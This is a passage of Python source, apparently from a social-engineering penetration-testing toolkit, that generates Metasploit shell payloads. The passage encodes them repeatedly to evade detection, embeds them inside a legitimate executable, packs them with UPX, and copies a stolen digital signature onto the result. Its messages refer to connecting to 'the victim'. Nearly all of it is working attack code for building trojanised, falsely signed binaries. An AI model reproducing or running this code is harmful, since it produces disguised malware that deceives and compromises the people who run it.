                if backdoor_execution != "on": backdoor_execution = ""
                subprocess.Popen("cp %s %s/legit.exe 1> /dev/null 2> /dev/null" % (custom_exe,setdir), shell=True).wait()
                encodepayload=subprocess.Popen(r"ruby %s/msfpayload %s LHOST=%s %s %s %s | ruby %s/msfencode  -c 10 -e x86/shikata_ga_nai -x %s/legit.exe -o %s/msf.exe -t exe %s 1> /dev/null 2>/dev/null" % (path,choice1,choice2,portnum,courtesyshell,choice4,path,setdir,setdir,backdoor_execution), shell=True).wait()
                print_status("Backdoor completed successfully. Payload is now hidden within a legit executable.")


                # define to use UPX or not
                if upx_encode == "ON":
                    if choice1 != "set/reverse_shell":
                        print_status("UPX Encoding is set to ON, attempting to pack the executable with UPX encoding.")
                        upx("%s/msf.exe" % (setdir))

                # define to use digital signature stealing or not
                if digital_steal == "ON":
                    print_status("Digital Signature Stealing is ON, hijacking a legit digital certificate")
                    disitool.CopyDigitalSignature("src/core/digitalsig/digital.signature", setdir + "/msf.exe", setdir + "/msf2.exe")
                    subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" % (setdir,setdir), shell=True).wait()
                    subprocess.Popen("cp %s/msf2.exe %s/msf.exe" % (setdir,setdir), shell=True).wait()
                encode1=("x86/shikata_ga_nai")

        if choice1 == 'windows/shell_bind_tcp' or choice1 == 'windows/x64/shell_bind_tcp' :
            print_info("When the payload is downloaded, you will want to connect to the victim directly.")

        # specify attack vector as SET interactive shell
        if choice1 == "set/reverse_shell": attack_vector = "set_payload"

        # if we have the java attack, multiattack java, and the set interactive shell
        if attack_vector == "java" or multiattack_java == "on":
            if attack_vector != "set_payload":
                # pull in the ports from config
                port1=check_config("OSX_REVERSE_PORT=")
                # define to use UPX or not
                if upx_encode == "ON":
                    if choice1 != "set/reverse_shell":
                        print_status(
                            "UPX Encoding is set to ON, attempting to pack the executable with UPX encoding."
                        )
                        upx("src/html/msf.exe")

                # define to use digital signature stealing or not
                if digital_steal == "ON":
                    print_status(
                        "Digital Signature Stealing is ON, hijacking a legit digital certificate"
                    )
                    disitool.CopyDigitalSignature(
                        "src/core/digitalsig/digital.signature",
                        "src/html/msf.exe", "src/program_junk/msf2.exe")
                    subprocess.Popen(
                        "cp src/program_junk/msf2.exe src/html/msf.exe 1> /dev/null 2> /dev/null",
                        shell=True).wait()
                    subprocess.Popen(
                        "cp src/program_junk/msf2.exe src/program_junk/msf.exe",
                        shell=True).wait()
                encode1 = ("x86/shikata_ga_nai")

        if choice1 == 'windows/shell_bind_tcp' or choice1 == 'windows/x64/shell_bind_tcp':
            print_info(
                "When the payload is downloaded, you will want to connect to the victim directly."
            )

        # specify attack vector as SET interactive shell